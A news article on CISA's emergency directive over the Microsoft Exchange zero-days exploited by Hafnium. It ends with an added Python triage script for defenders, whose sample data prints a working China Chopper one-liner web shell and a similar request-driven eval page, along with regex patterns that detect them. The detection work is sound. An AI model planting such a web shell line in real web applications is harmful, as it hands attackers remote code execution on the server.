The US government’s Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning all government civilian departments and agencies running an on-premises Microsoft Exchange installation to update or disconnect the product as the impact of four newly disclosed vulnerabilities – CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 – spreads.
The CISA has also called on US agencies to collect forensic images and search for known indicators of compromise (IOCs) in response to active exploitation of the vulnerabilities, which have prompted an out-of-sequence patch from Microsoft.
“This emergency directive will help us secure federal networks against the immediate threat while CISA works with its interagency partners to better understand the malicious actor’s techniques and motivations to share with our stakeholders,” said acting CISA director Brandon Wales.
“The swiftness with which CISA issued this emergency directive reflects the seriousness of this vulnerability and the importance of all organisations – in government and the private sector – to take steps to remediate it.”
Nominet government security expert Steve Forbes commented: “CISA’s directive … for agencies to report back on their level of exposure, apply security fixes, or disconnect the program, is the latest in a series of increasingly regular emergency directives the agency has issued since it was established two years ago.
“Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications,” he said.
Caution on the part of public sector organisations – the UK’s National Cyber Security Centre has also issued an alert – appears well-advised, as security researchers and observers from around the world weigh in on the vulnerabilities, saying they may be being much more widely exploited than Microsoft’s disclosure would imply.
While Redmond described the attacks as targeted and limited – and likely originating from a Chinese state-backed actor known as Hafnium in its classification matrix – John Hammond of Huntress Security said his own scans had identified over 200 of his firm’s partners’ servers that had received web shell payloads as per Microsoft’s disclosure.
“These companies do not perfectly align with Microsoft’s guidance as some personas are small hotels, an ice-cream company, a kitchen appliance manufacturer, multiple senior citizen communities and other mid-market businesses,” said Hammond.
“We’ve also witnessed many city and county government victims, healthcare providers, banks [and] financial institutions, and several residential electricity providers.”
Hammond said that among the vulnerable servers his scans had found over 350 web shells (some clients may have more than one), which potentially indicates automated deployment or multiple uncoordinated actors. He added that the endpoints observed did have antivirus or endpoint detection and response on board, but that the threat actors appeared to be slipping past most defensive products, making patching even more crucial.
“With insight from the community, we’ve seen honeypots attacked, making it clear that threat actors are just scanning the internet looking for low-hanging fruit,” he said.
“These attacks are grave due to the fact that every organisation [relies on] email and Microsoft Exchange is so widely used. These servers are typically publicly accessible on the open internet and they can be exploited remotely. These vulnerabilities can be leveraged to gain remote code execution and fully compromise the target. From there, the attackers have a foothold in the network and can expand their access and do much more damage.”
Red Canary intelligence director Katie Nickels said she, too, was observing activity related to the exploitation of the disclosed vulnerabilities, but there was some good news in that, in this case, post-exploitation activity is highly detectable.
“We will never be able to stop zero-days, but organisations that practice defence-in-depth and maintain behavioural analytics to alert on common attacks should feel confident about their ability to detect this activity,” she said.
“Some of the activity we observed uses the China Chopper web shell, which has been around for more than eight years, giving defenders ample time to develop detection logic for it. [And] while we can never fully prevent all exploitation, defenders can work to decrease the time it takes to identify post-exploitation activity. By catching it as quickly as possible, they can stop adversaries from gaining an additional foothold in their environment and causing significant damage,” she said.
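The detection logic Nickels refers to can be as simple as content triage of the .aspx files dropped on an Exchange server. The following is an added illustration, not code from the article or from Red Canary or Huntress: it classifies constructed sample page contents by matching the publicly documented one-line China Chopper ASP.NET pattern (a request parameter passed straight to `eval(..., "unsafe")`) and a looser heuristic for other request-driven eval calls; the file names and bodies are made up for the example.

```python
import re
from typing import Dict, List

# Constructed sample .aspx contents (labelled as such; not artefacts from any incident).
SAMPLES: Dict[str, str] = {
    # Looks like a normal Exchange OWA page: code-behind class, static markup only.
    "sample_legit.aspx": '<%@ Page Language="C#" Inherits="Microsoft.Exchange.Clients.Owa.Core.Logon" %>\n'
                         '<html><body><form runat="server"></form></body></html>',
    # Classic China Chopper ASP.NET one-liner shape: eval(Request.Item["..."], "unsafe").
    "sample_shell.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    # Not the exact Chopper shape, but still evaluates attacker-controlled request input.
    "sample_eval.aspx": '<%@ Page Language="Jscript" %>\n<% var c = Request.Form["cmd"]; eval(c, "unsafe"); %>',
}

# Pattern for the documented China Chopper ASP.NET variant (Request[...] or Request.Item[...]).
CHOPPER_RE = re.compile(
    r'eval\s*\(\s*Request(?:\.Item)?\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
    re.IGNORECASE,
)
# Looser heuristic: any eval/Execute call on the same line as a Request object.
REQUEST_EXEC_RE = re.compile(r'\b(?:eval|Execute|ExecuteGlobal)\s*\(.*\bRequest\b', re.IGNORECASE)
# Generic fallback: a Request value stored and later passed to eval anywhere in the file.
STORED_EVAL_RE = re.compile(r'Request\b.*\beval\s*\(', re.IGNORECASE | re.DOTALL)


def classify_aspx(content: str) -> str:
    """Return 'china_chopper', 'suspicious_eval' or 'clean' for one page body."""
    if CHOPPER_RE.search(content):
        return "china_chopper"
    if REQUEST_EXEC_RE.search(content) or STORED_EVAL_RE.search(content):
        return "suspicious_eval"
    return "clean"


def triage(files: Dict[str, str]) -> List[Dict[str, str]]:
    """Classify every file and return only the ones that need an analyst's attention."""
    hits = []
    for name, body in files.items():
        verdict = classify_aspx(body)
        if verdict != "clean":
            hits.append({"file": name, "verdict": verdict})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLES):
        print(f"{hit['verdict']:16} {hit['file']}")
```

On a live server the same function would be run over the web-accessible directories of the Exchange installation, with any hit cross-referenced against file creation time and the IIS request log before remediation.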
Source is ComputerWeekly.com